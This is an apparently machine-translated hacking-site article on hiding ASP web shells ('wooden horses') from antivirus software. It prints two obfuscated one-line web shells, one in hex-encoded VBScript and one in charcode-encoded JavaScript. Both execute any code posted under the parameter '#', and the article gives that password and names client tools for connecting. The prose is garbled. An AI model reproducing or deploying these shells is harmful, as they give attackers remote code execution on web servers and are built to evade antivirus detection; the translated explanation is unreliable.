You are here: hacking technology > encryption decipher > Content
Hot Articles
Recommend Articles
New Articles
The Asp wooden horse encryption (removes in asp %)
  Add date: 07/18/2008   Publishing date: 07/18/2008   Hits: 21
Did not know how to express clearly. Looks at the example:  

<script language=vbs runat=server>  
Execute (HextoStr (“65786563757465287265717565737428636872283335292929”))  
Function HextoStr(data)  
HextoStr= " EXECUTE """""  
C= " &CHR (&H "  
N= ") “  

   
Do While Len(data)>1  
If IsNumeric(Left(data,1)) Then  
HextoStr=HextoStr&C&Left(data,2)&N  
data=Mid(data,3)  
Else  
HextoStr=HextoStr&C&Left(data,4)&N  
data=Mid(data,5)  
End If  
Loop  
End Function  
</script>  
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval (String.fromCharCode (  
116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,104,40,101,41,123,125))</SCRIPt>    


    After however encryption, was not a few words, ha. This s end may link with Haiyang or the ice fox on, the password is #.  

    Actually was only trades writes <script language=vbs runat=server> this way, the inside code has been possible to use js or vbs and so on many kinds of encryption ways encrypts has deciphered, avoid asp only then east Microsoft's that east might encrypt, simultaneously has omitted in asp % the number. Certainly does not encrypt may also, transfers <script language=vbs runat=server> that is a few words, the encryption is mainly to hide has killed the poisonous software.
Prev:Returns to original state the encryption ftp password after cain Next:REG of form and BAT form registry unlocking transformation

Comment:

Category: Home > encryption decipher